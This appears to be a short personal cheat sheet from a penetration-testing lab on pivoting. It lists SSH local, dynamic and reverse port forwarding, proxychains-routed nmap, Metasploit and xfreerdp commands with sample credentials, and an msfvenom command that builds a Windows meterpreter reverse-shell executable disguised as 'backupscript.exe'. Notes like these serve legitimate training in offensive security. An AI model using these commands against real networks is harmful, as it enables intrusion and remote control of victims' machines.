b0ysie7e

Appearance

Port Forwarding SSH

Dynamic Port Forwarding with SSH and SOCKS Tunneling

Local Port Forward

c
$ ssh -L 1234:localhost:3306 ubuntu@10.129.202.64

Confirming Port Forward with Netstat

c
$ netstat -antp | grep 1234

Forwarding Multiple Ports

c
$ ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64

Enabling Dynamic Port Forwarding with SSH

c
$ ssh -D 9050 ubuntu@10.129.202.64

config /etc/proxychains.conf

c
cat /etc/proxychains.conf

# meanwile
# defaults set to "tor"
socks4 	127.0.0.1 9050

Nmap with Proxychains

c
proxychains nmap -v -sn 172.16.5.1-200

Metasploit with Proxychains

c
proxychains msfconsole

Using rdp_scanner Module

shell-session
msf6 > search rdp_scanner

Using xfreerdp with Proxychains

shell-session
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123

Reverse Port Forwarding with SSH

Creating a Windows Payload with msfvenom

c
msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080
c
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN